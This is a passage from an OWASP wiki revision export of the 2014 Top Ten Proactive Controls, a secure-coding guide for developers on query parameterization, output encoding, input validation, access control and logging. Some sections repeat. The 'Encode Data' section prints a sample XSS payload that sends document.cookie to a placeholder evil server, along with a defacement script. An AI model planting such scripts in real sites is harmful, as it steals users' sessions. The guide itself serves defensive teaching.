== 5: Establish Identity and Authentication Controls ==<br />
<br />
Authentication is the process of verification that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
'''Key References'''<br />
* [[Authentication Cheat Sheet]]<br />
* [[Password Storage Cheat Sheet]]<br />
* [[Forgot Password Cheat Sheet]] <br />
* [[Session Management Cheat Sheet]]<br />
<br />
<br />
== 6: Protect Data and Privacy ==<br />
<br />
=== Use Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
'''Key References'''<br />
* Proper SSL/TLS configuration: [[Transport Layer Protection Cheat Sheet]]<br />
* Protecting users from man-in-the-middle attacks via fraudulent SSL certificates: [[Pinning Cheat Sheet]]<br />
<br />
=== Use Encryption at Rest ===<br />
<br />
Cryptographic storage is difficult to build securely. It's critical to classify data in your system and determine that data needs to be encrypted, such as the need to encrypt credit cards per the PCI compliance standard. Also, any time you start building your own low-level crypto on your own, ensure you are or have the assistance of a deep applied crypto expert. Consider well vetted cryptographic libraries such as the [https://code.google.com/p/keyczar/ Google KeyCzar] project. Also, be prepared to handle the more difficult aspects of applied crypto such as key management, overall cryptographic architecture design as well as tiering and trust issue in complex software. <br />
<br />
'''Key References'''<br />
* Information on low level decisions necessary when encrypting data at rest: [[Cryptographic Storage Cheat Sheet]] <br />
* [[Password Storage Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [https://www.owasp.org/index.php/O-Saft OWASP SSL Audit for Testers]<br />
<br />
=== Implement Protection in Process ===<br />
<br />
Data can be exposed during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
<br />
== 7: Implement Logging and Intrusion Detection ==<br />
<br />
Application logging should not be an afterthought or limited to debugging and troubleshooting. Logging is also used in other important activities:<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
Use a common logging approach to ensure that all log entries are consistent, and contain essential information including source and timestamp.<br />
<br />
The [[OWASP AppSensor Project]] defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. <br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
It is important not to log too much, or too little - be careful not to log private or confidential data or secrets. Use knowledge of the intended purposes to guide what, when and how much. To protect from Log Injection aka Log Forging, make sure to perform validation or encoding on untrusted data before logging it.<br />
<br />
'''Key References'''<br />
* How to properly implement logging in an application: [[Logging Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [[OWASP AppSensor Project]]<br />
<br />
<br />
== 8: Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* [http://static.springsource.org/spring-security/site/index.html Spring Security]<br />
* [http://shiro.apache.org/ Apache Shiro]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet PHP Security Cheat Sheet]<br />
* [https://www.owasp.org/index.php/.NET_Security_Cheat_Sheet .NET Security Cheat Sheet]<br />
<br />
<br />
== 9: Include Security-Specific Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use cases or user stories which include input, behavior and output, and can be reviewed and tested for functional correctness by Q/A staff. For example, checking for re-authentication during change password or checking to make sure that changes to certain data were properly logged.<br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features include multi-step multi-branch workflows that are difficult to evaluate thoroughly and involve money or valuable items, user credentials, private information or command/control functions, for example eCommerce workflows, shipping route choices, or banking transfer validation. The user stories or use cases for these requirements should include exceptions and failure scenarios (what happens if a step fails or times out or if the user tries to cancel or repeat a step?) and requirements derived from "abuse cases". Abuse cases describe how the application's functions could be subverted by attackers. Walking through failures and abuse case scenarios will uncover weaknesses in validation and error handling that impact the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must always be aware of any personal or confidential information in the system and make sure that this data is protected. What is the source of the data? Can the source be trusted? Where is the data stored or displayed? Does it have to be stored or displayed? Who is authorized to create it, see it, change it, and is all of this tracked? This will drive the need for data validation, access control, encryption, and auditing and logging controls in the system.<br />
<br />
'''Key References'''<br />
* [[OWASP Application Security Verification Standard Project]]<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model]<br />
<br />
<br />
== 10: Design and Architect Security In ==<br />
<br />
There are several areas where you need to be concerned about security in the architecture and design of a system. These include:<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team must understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls to enforce at the client, the web layer, the business logic layer, the data management layer, and where to establish trust between different systems or different parts of the same system. Trust boundaries determine where to make decisions about authentication, access control, data validation and encoding, encryption and logging. Data, sources of data and services inside a trust boundary can be trusted - anything outside of a trust boundary cannot be. When designing or changing the design or a system, make sure to understand assumptions about trust, make sure that these assumptions are valid, and make sure that they are followed consistently.<br />
<br />
3) '''Manage the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (should you do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model (OpenSAMM)]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project Application Security Verification Standard Project]<br />
* [https://www.owasp.org/index.php/Application_Security_Architecture_Cheat_Sheet Application Security Architecture Cheat Sheet]<br />
* [[Attack Surface Analysis Cheat Sheet]]<br />
* [[Threat Modeling Cheat Sheet]]<br />
<br />
= Formal Numbering =<br />
<br />
* OWASP-C1: Parameterize Queries<br />
* OWASP-C2: Encode Data<br />
* OWASP-C3: Validate All Inputs<br />
* OWASP-C4: Implement Appropriate Access Controls<br />
* OWASP-C5: Establish Identity and Authentication Controls<br />
* OWASP-C6: Protect Data and Privacy<br />
* OWASP-C7: Implement Logging, Error Handling and Intrusion Detection<br />
* OWASP-C8: Leverage Security Features of Frameworks and Security Libraries<br />
* OWASP-C9: Include Security-Specific Requirements<br />
* OWASP-C10: Design and Architect Security In<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! <br />
<br />
== Roadmap ==<br />
<br />
End of April : Complete community review process<br/><br />
End of May : Release final document in well designed PDF form<br />
<br />
== Status ==<br />
<br />
March 10, 2014: We released an early beta of this document to the OWASP leaders list for review and commentary.<br/><br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]] [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]] [[Category:OWASP_Document]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=176251OWASP Proactive Controls2014-06-02T14:54:49Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:Proactive-header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. And even when they do, there may be inherent flaws in requirements and designs. When it comes to web security, developers are often set up to lose the security game.<br />
<br />
The OWASP Top Ten Proactive Controls is a list of security techniques that should be included in every software development project. This document was written by developers for developers to assist those new to secure development.<br />
<br />
* 1: Parameterize Queries<br />
* 2: Encode Data<br />
* 3: Validate All Inputs<br />
* 4: Implement Appropriate Access Controls<br />
* 5: Establish Identity and Authentication Controls<br />
* 6: Protect Data and Privacy<br />
* 7: Implement Logging, Error Handling and Intrusion Detection<br />
* 8: Leverage Security Features of Frameworks and Security Libraries<br />
* 9: Include Security-Specific Requirements<br />
* 10: Design and Architect Security In<br />
<br />
For more information, see the [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls complete document here].<br />
<br />
==Licensing==<br />
<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is This? ==<br />
<br />
The OWASP Top Ten Proactive Controls describes the top control and control categories that every architect and developer should absolutely, 100% include in every project.<br />
<br />
== Project Leaders ==<br />
<br />
* [https://www.owasp.org/index.php/User:Jmanico Jim Manico] [mailto:jim.manico@owasp.org @]<br />
* [https://www.owasp.org/index.php/User:Jim_Bird Jim Bird] [mailto:jimbird@shaw.ca @]<br />
<br />
== Key Contributors ==<br />
<br />
* Danny Harris [mailto:danny.harris@owasp.org @]<br />
* Stephen de Vries<br />
* Andrew Van Der Stock<br />
* Gaz Heyes<br />
* Colin Watson<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[OWASP Mobile Security Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== Quick Access ==<br />
<br />
* Top Ten Proactive Controls 2014 [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls full description].<br />
<br />
== News and Events ==<br />
* [10 Mar 2014] [http://lists.owasp.org/pipermail/owasp-leaders/2014-March/011047.html Request for review]<br />
* [04 Feb 2014] New Wiki Template!<br />
<br />
== Mailing List ==<br />
<br />
Keep up-to-date via the [https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List].<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten Proactive Controls 2014. <br />
<br />
<br />
== 1: Parameterize Queries ==<br />
<br />
SQL Injection is one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of Query Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
'''Key References'''<br />
* [[Query Parameterization Cheat Sheet]]<br />
* [https://www.owasp.org/index.php/OWASP_Secure_Coding_Practices_-_Quick_Reference_Guide OWASP Secure Coding Practices Quick Reference Guide]<br />
<br />
<br />
== 2: Encode Data ==<br />
<br />
Encoding is a powerful mechanism to help protect against many types of attack, especially injection attacks. Essentially, encoding involves translating special characters into some equivalent that is no longer significant in the target interpreter. A specific example of encoding is output encoding necessary to prevent Cross Site Scripting. <br />
<br />
Web developers often build web pages dynamically, consisting of a mix of developer built HTML/JavaScript and database data that was originally populated with user input. This input should be considered to be untrusted data and dangerous, which requires special handling when building a secure web application. Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in the user's browser and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML. Forms of encoding needing to stop XSS include HTML Entity Encoding, JavaScript Encoding and Percent Encoding (aka URL Encoding). Encoding needed to stop other forms of injection include unix encoding, windows encoding, LDAP encoding, XML encoding and others.<br />
<br />
'''Key References'''<br />
* Stopping XSS in your web application: OWASP [[XSS (Cross Site Scripting) Prevention Cheat Sheet]]<br />
* General information about injection: [[Top 10 2013-A1-Injection]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_Java_Encoder_Project OWASP Java Encoder Project]<br />
* [https://www.owasp.org/index.php/OWASP_Encoder_Comparison_Reference_Project OWASP Encoder Comparison Reference Project]<br />
<br />
<br />
== 3: Validate All Inputs ==<br />
<br />
It is critical to treat all input from outside of the application (for example, from browsers or mobile clients, from outside systems or files) as untrusted. For web applications this includes HTTP headers, cookies, and GET and POST parameters: any or all of this data could be compromised by an attacker.<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types of input validation: “white list" validation and "black list" validation. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively because it can be bypassed through encoding and other obfuscation techniques, and is not recommended when building a secure web application. The following examples will focus on white list validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation white list of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
'''Key References''' <br />
* [[Input Validation Cheat Sheet]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_JSON_Sanitizer OWASP JSON Sanitizer Project]<br />
* [https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer OWASP Java HTML Sanitizer Project]<br />
<br />
<br />
== 4: Implement Appropriate Access Controls ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular feature of resource should be granted or denied. It should be noted that authorization is not equivalent to authentication. These terms and their definitions are frequently confused. Access Control can be a rather complex and design-heavy security control. The following "positive" access control design requirements should be considered at the initial stages of application development. Once you have chosen a specific access control design pattern, it is often difficult and time consuming to re-engineer access control in your application with a new pattern. Access Control is one of the main areas of application security software design that must be heavily thought-through up front. <br />
<br />
=== Force all requests to go through access control checks ===<br />
Most frameworks and languages only check a feature for access control if a programmer adds that check. The opposite is a more security-centric design. Consider using a filter or other automatic mechanism to ensure that all requests go through some kind of access control check.<br />
<br />
=== Deny by default ===<br />
In line with automatic access control checking, consider denying all access control checks for features that have not been configured for access control. Normally the opposite is true in that newly created features automatically grant users full access until a developer has added that check. <br />
<br />
=== Avoid hard-coded policy-based access control checks in code ===<br />
Very often, access control policy is hard-coded deep in application code. This makes auditing or proving the security of that software very difficult and time consuming. Access control policy and application code, when possible, should be separated. Another way of saying this is that your enforcement layer (checks in code) and your access control decision making process (the access control "engine") should be separated when possible. <br />
<br />
=== Code to the activity ===<br />
Most web frameworks use role based access control as the primary method for coding enforcement points in code. While it's acceptable to use roles in access control mechanisms, coding specifically to the role in application code is an anti-pattern. Considering checking if the user has access to that feature in code, as opposed to checking what role the user is in code.<br />
<br />
=== Server-side trusted data should drive access control ===<br />
The vast majority of data you need to make an access control decision (who is the user and are they logged in, what entitlements does the user have, what is the access control policy, what feature and data is being requested, what time is it, what geolocation is it, etc) should be retrieved "server-side" in a standard web or web service application. Policy data such as a users role or an access control rule should never be part of the request. In a standard web application, the only client-side data that is needed for access control is the id or ids of the data being accessed. Most all other data needed to make an access control decision should be retrieved server-side.<br />
<br />
'''Key References'''<br />
* [[Access Control Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [https://www.owasp.org/index.php/OWASP_PHPRBAC_Project OWASP PHPRBAC Project]<br />
<br />
<br />
== 5: Establish Identity and Authentication Controls ==<br />
<br />
Authentication is the process of verification that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
'''Key References'''<br />
* [[Authentication Cheat Sheet]]<br />
* [[Password Storage Cheat Sheet]]<br />
* [[Forgot Password Cheat Sheet]] <br />
* [[Session Management Cheat Sheet]]<br />
<br />
<br />
== 6: Protect Data and Privacy ==<br />
<br />
=== Use Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
'''Key References'''<br />
* Proper SSL/TLS configuration: [[Transport Layer Protection Cheat Sheet]]<br />
* Protecting users from man-in-the-middle attacks via fraudulent SSL certificates: [[Pinning Cheat Sheet]]<br />
<br />
=== Use Encryption at Rest ===<br />
<br />
Cryptographic storage is difficult to build securely. It's critical to classify data in your system and determine that data needs to be encrypted, such as the need to encrypt credit cards per the PCI compliance standard. Also, any time you start building your own low-level crypto on your own, ensure you are or have the assistance of a deep applied crypto expert. Consider well vetted cryptographic libraries such as the [https://code.google.com/p/keyczar/ Google KeyCzar] project. Also, be prepared to handle the more difficult aspects of applied crypto such as key management, overall cryptographic architecture design as well as tiering and trust issue in complex software. <br />
<br />
'''Key References'''<br />
* Information on low level decisions necessary when encrypting data at rest: [[Cryptographic Storage Cheat Sheet]] <br />
* [[Password Storage Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [https://www.owasp.org/index.php/O-Saft OWASP SSL Audit for Testers]<br />
<br />
=== Implement Protection in Process ===<br />
<br />
Data can be exposed during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
<br />
== 7: Implement Logging and Intrusion Detection ==<br />
<br />
Application logging should not be an afterthought or limited to debugging and troubleshooting. Logging is also used in other important activities:<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
Use a common logging approach to ensure that all log entries are consistent, and contain essential information including source and timestamp.<br />
<br />
The [[OWASP AppSensor Project]] defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. <br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
It is important not to log too much, or too little - be careful not to log private or confidential data or secrets. Use knowledge of the intended purposes to guide what, when and how much. To protect from Log Injection aka Log Forging, make sure to perform validation or encoding on untrusted data before logging it.<br />
<br />
'''Key References'''<br />
* How to properly implement logging in an application: [[Logging Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [[OWASP AppSensor Project]]<br />
<br />
<br />
== 8: Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* [http://static.springsource.org/spring-security/site/index.html Spring Security]<br />
* [http://shiro.apache.org/ Apache Shiro]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet PHP Security Cheat Sheet]<br />
* [https://www.owasp.org/index.php/.NET_Security_Cheat_Sheet .NET Security Cheat Sheet]<br />
<br />
<br />
== 9: Include Security-Specific Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use cases or user stories which include input, behavior and output, and can be reviewed and tested for functional correctness by Q/A staff. For example, checking for re-authentication during change password or checking to make sure that changes to certain data were properly logged.<br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features include multi-step multi-branch workflows that are difficult to evaluate thoroughly and involve money or valuable items, user credentials, private information or command/control functions, for example eCommerce workflows, shipping route choices, or banking transfer validation. The user stories or use cases for these requirements should include exceptions and failure scenarios (what happens if a step fails or times out or if the user tries to cancel or repeat a step?) and requirements derived from "abuse cases". Abuse cases describe how the application's functions could be subverted by attackers. Walking through failures and abuse case scenarios will uncover weaknesses in validation and error handling that impact the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must always be aware of any personal or confidential information in the system and make sure that this data is protected. What is the source of the data? Can the source be trusted? Where is the data stored or displayed? Does it have to be stored or displayed? Who is authorized to create it, see it, change it, and is all of this tracked? This will drive the need for data validation, access control, encryption, and auditing and logging controls in the system.<br />
<br />
'''Key References'''<br />
* [[OWASP Application Security Verification Standard Project]]<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model]<br />
<br />
<br />
== 10: Design and Architect Security In ==<br />
<br />
There are several areas where you need to be concerned about security in the architecture and design of a system. These include:<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team must understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls to enforce at the client, the web layer, the business logic layer, the data management layer, and where to establish trust between different systems or different parts of the same system. Trust boundaries determine where to make decisions about authentication, access control, data validation and encoding, encryption and logging. Data, sources of data and services inside a trust boundary can be trusted - anything outside of a trust boundary cannot be. When designing or changing the design or a system, make sure to understand assumptions about trust, make sure that these assumptions are valid, and make sure that they are followed consistently.<br />
<br />
3) '''Manage the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (should you do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model (OpenSAMM)]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project Application Security Verification Standard Project]<br />
* [https://www.owasp.org/index.php/Application_Security_Architecture_Cheat_Sheet Application Security Architecture Cheat Sheet]<br />
* [[Attack Surface Analysis Cheat Sheet]]<br />
* [[Threat Modeling Cheat Sheet]]<br />
<br />
= Formal Numbering =<br />
<br />
* OWASP-C1: Parameterize Queries<br />
* OWASP-C2: Encode Data<br />
* OWASP-C3: Validate All Inputs<br />
* OWASP-C4: Implement Appropriate Access Controls<br />
* OWASP-C5: Establish Identity and Authentication Controls<br />
* OWASP-C6: Protect Data and Privacy<br />
* OWASP-C7: Implement Logging, Error Handling and Intrusion Detection<br />
* OWASP-C8: Leverage Security Features of Frameworks and Security Libraries<br />
* OWASP-C9: Include Security-Specific Requirements<br />
* OWASP-C10: Design and Architect Security In<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! <br />
<br />
== Roadmap ==<br />
<br />
End of April : Complete community review process<br/><br />
End of May : Release final document in well designed PDF form<br />
<br />
== Status ==<br />
<br />
March 10, 2014: We released an early beta of this document to the OWASP leaders list for review and commentary.<br/><br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
__NOTOC__ <headertabs /><br />
<br />
